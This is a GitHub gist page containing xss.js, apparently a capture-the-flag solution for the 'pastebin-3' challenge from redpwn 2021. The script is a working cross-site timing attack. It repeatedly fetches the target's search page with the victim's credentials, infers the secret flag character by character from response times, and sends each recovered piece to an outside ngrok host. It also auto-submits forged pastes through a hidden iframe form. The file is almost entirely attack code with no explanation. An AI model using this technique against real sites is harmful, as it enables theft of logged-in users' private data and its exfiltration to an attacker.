Skip to content

Instantly share code, notes, and snippets.

@maple3142

maple3142/xss.js

Created July 12, 2021 19:12
Show Gist options
  • Save maple3142/10e3d6f03e307016e54e7f9b6073214a to your computer and use it in GitHub Desktop.
Save maple3142/10e3d6f03e307016e54e7f9b6073214a to your computer and use it in GitHub Desktop.
Download ZIP
redpwn 2021 pastebin-3
Raw
xss.js
function timeurl(url) {
return new Promise(res => {
const start = performance.now()
fetch(url, {
mode: 'no-cors',
credentials: 'include'
})
.then(() => {
res(performance.now() - start)
})
.catch(() => {
res(performance.now() - start)
})
})
}
async function avgRespTime(url, n = 3) {
let sum = 0
for (let i = 0; i < n; i++) {
sum += await timeurl(url)
}
return sum / n
}
function log(...args) {
console.log(...args)
return fetch('https://9a5c8db108b9.ngrok.io?log=' + args).catch(e => e)
}
function createPaste(paste) {
const ifr = document.createElement('iframe')
ifr.srcdoc = `<form id=frm action=https://pastebin-3.mc.ax/create_paste method=post><textarea name=paste>${paste}</textarea></form><script>frm.submit()</script>`
document.body.appendChild(ifr)
}
;(async () => {
// increase timing accuracy
// for (let i = 0; i < 10000; i++) {
// createPaste(
// 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
// )
// }
// log('done')
// some sanity check
log('TEST:flag', await avgRespTime('https://pastebin-3.mc.ax/search?query=flag'))
log('TEST:flaga', await avgRespTime('https://pastebin-3.mc.ax/search?query=flaga'))
// random pinging
setInterval(() => fetch('https://example.com'), 1000)
// bruteforce the flag
const charset = '{_}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
let flag = 'flag{c00k13_b0mb1n6_15_f4k3_vuln}'
while (true) {
for (const c of charset) {
const t = await avgRespTime(`https://pastebin-3.mc.ax/search?query=${flag + c}`)
if (t < 150) {
flag += c
log(flag, t)
break
}
}
if (flag.endsWith('}')) {
break
}
}
})()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment